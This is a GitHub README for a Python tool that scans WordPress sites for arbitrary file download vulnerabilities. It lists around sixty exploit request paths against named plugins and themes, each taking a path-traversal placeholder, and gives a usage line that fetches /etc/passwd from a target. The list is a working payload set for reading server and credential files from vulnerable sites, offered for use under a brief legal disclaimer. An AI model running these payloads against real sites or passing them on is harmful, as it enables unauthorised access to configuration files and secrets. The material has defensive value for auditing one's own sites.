Skip to content

MrCl0wnLab/afdWordpress

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Wordpress A.F.D. Verification

Version Python 3.7 Build Build GitHub

Check arbitrary file download vulnerability in the WordPress

 + Autor: MrCl0wn
 + Blog: http://blog.mrcl0wn.com
 + GitHub: https://github.com/MrCl0wnLab
 + Twitter: https://twitter.com/MrCl0wnLab
 + Email: mrcl0wnlab\@\gmail.com

WARNING

+------------------------------------------------------------------------------+
|  [!] Legal disclaimer: Usage of afdWordpress for attacking                   |
|  targets without prior mutual consent is illegal.                            |
|  It is the end user's responsibility to obey all applicable                  | 
|  local, state and federal laws.                                              |
|  Developers assume no liability and are not responsible for any misuse or    |
|  damage caused by this program                                               |
+------------------------------------------------------------------------------+

GitHub

DESCRIPTION

This tool aims to facilitate checking arbitrary file download vulnerability

REQUIREMENTS

threading
argparse
csv
collections
random
urllib

INSTALL

$ git clone https://github.com/MrCl0wnLab/afdWordpress
$ cd afdWordpress
$ pip3.7 install -r requirements.txt

HELP

$ git clone https://github.com/MrCl0wnLab/afdWordpress
$ cd afdWordpress
$ python3.7 afd.py --help


        ▄████████    ▄████████ ████████▄  
        ███    ███   ███    ███ ███   ▀███ 
        ███    ███   ███    █▀  ███    ███ 
        ███    ███  ▄███▄▄▄     ███    ███ 
      ▀███████████ ▀▀███▀▀▀     ███    ███ 
        ███    ███   ███        ███    ███ 
        ███    ███   ███        ███   ▄███ 
        ███    █▀    ███        ████████▀ 
        Arbitrary File Download-[ Verifier ]
        By MrCl0wn
        
usage: tool [-h] --url http://url [--file /file.php] [--threads 10]

optional arguments:
  -h, --help        show this help message and exit
  --url http://url  URL to request Ex: http://www.host.com
  --file /file.php  File to fuzzing Ex: /wp-admin.php
  --threads 10      Threads

USE

$ python3.7 afd.py --url https://blog.mrcl0wn.com 
$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50
$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50 --file /etc/passwd

SOURCE VERIFICATION

File: inject.csv

exploit_uri pwd_count ref
/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=PWD__FILE 4
/?mdocs-img-preview=PWD__FILE 3
/mdocs-posts/?mdocs-img-preview=PWD__FILE 3
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=PWD__FILE 1
/wp-admin/admin-ajax.php?action=revslider_show_image&img=PWD__FILE 0
/wp-admin/admin-ajax.php?action=revslider_show_image&img=PWD__FILE 1
/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=PWD__FILE&order=name&srt=yes 0
/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=PWD__FILE 1
/wp-admin/tools.php?content=&wp-attachment-export-download=true 0 https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true 0 https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html
/wp-content/force-download.php?file=PWD__FILE 0
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=PWD__FILE 0
/wp-content/plugins//asgallDownload.php?imgname=PWD__FILE 3
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=PWD__FILE 3
/wp-content/plugins/allow-l10n-upload-filename/download.php?id=PWD__FILE 3
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=PWD__FILE 3
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=PWD__FILE 2
/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=PWD__FILE 3
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=PWD__FILE 10
/wp-content/plugins/count-per-day/download.php?n=1&f=PWD__FILE 0
/wp-content/plugins/document_manager/views/file_download.php?fname=PWD__FILE 2
/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=PWD__FILE&file_size=10 4
/wp-content/plugins/history-collection/download.php?var=PWD__FILE 3
/wp-content/plugins/hwm_board/download.php?filename=PWD__FILE 0
/wp-content/plugins/hwm_board/download.php?filename=PWD__FILE&fileNa=PWD__FILE 0
/wp-content/plugins/image-export/download.php?file=PWD__FILE 0
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/PWD__FILE 0
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/PWD__FILE 0
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/PWD__FILE 0
/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=PWD__FILE 0
/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=PWD__FILE 6
/wp-content/plugins/recent-backups/download-file.php?file_link=PWD__FILE 0
/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=PWD__FILE&path=PWD__FILE 7
/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=PWD__FILE 7
/wp-content/plugins/sermon-shortcodes/download.php?file=PWD__FILE 0 https://packet..com/files/150507/...bitrary-File-Download.html
/wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=PWD__FILE 0 https://cxsecurity.com/issue/WLB-2018110241
/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=PWD__FILE 3 https://dl.packe...503-exploits/wpaspose-disclose.txt
/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=PWD__FILE 9 https://www.exploit-db.com/exploits/37530
/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=PWD&filename=FILE&action=download 2 https://wp.com/vulnerabilities/6499
/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=PWD__FILE&name=PWD__FILE 0
/wp-content/plugins/wp-swimteam/include/user/download.php?file=PWD__FILE&filename=PWD__FILE&contenttype=text/html&transient=1&abspath=/usr/share/wordpress 0 https://www.exploit-db.com/exploits/37601
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=PWD__FILE 0
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/PWD__FILE 0
/wp-content/themes/antioch/lib/scripts/download.php?file=PWD__FILE 5
/wp-content/themes/authentic/includes/download.php?file=PWD__FILE 4
/wp-content/themes/churchope/lib/downloadlink.php?file=PWD__FILE 4
/wp-content/themes/epic/includes/download.php?file=PWD__FILE 0
/wp-content/themes/erinvale/download.php?file=PWD__FILE 3 https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt
/wp-content/themes/felis/download.php?file=PWD__FILE 0
/wp-content/themes/fiestaresidences/download.php?file=PWD__FILE 3 https://dl.packe.../1808-exploits/wpdreamsmiths-disclose.txt
/wp-content/themes/hsv/download.php?file=PWD__FILE 3 https://dl.packet.../1808-exploits/wpdreamsmiths-disclose.txt
/wp-content/themes/linenity/functions/download.php?imgurl=PWD__FILE 4
/wp-content/themes/lote27/download.php?download=PWD__FILE 3
/wp-content/themes/markant/download.php?file=PWD__FILE 2
/wp-content/themes/MichaelCanthony/download.php?file=PWD__FILE 3
/wp-content/themes/mTheme-Unus/css/css.php?files=PWD__FILE 4
/wp-content/themes/NativeChurch/download/download.php?file=PWD__FILE 4
/wp-content/themes/optimus/download.php?file=PWD__FILE 3 https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt
/wp-content/themes/SMWF/inc/download.php?file=PWD__FILE 0
/wp-content/themes/TheLoft/download.php?file= 3
/wp-content/themes/trinity/lib/scripts/download.php?file=PWD__FILE 5
/wp-content/themes/urbancity/lib/scripts/download.php?file=PWD__FILE 5
/wp-content/themes/yakimabait/download.php?file=PWD__FILE 0

DESCRIPTION FILE

exploit_uri pwd_count ref
url_exploit_get count_mount_pwd ref_exploit

exploit_uri: Request get for exploration and concatenation with target_url.

pwd_count: Count pwd for concatenation loop.

ref: This column is referential document.

OUTPUT RESULT

ok-file.log

error-file.log

About

Check arbitrary file download vulnerability in the WordPress

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages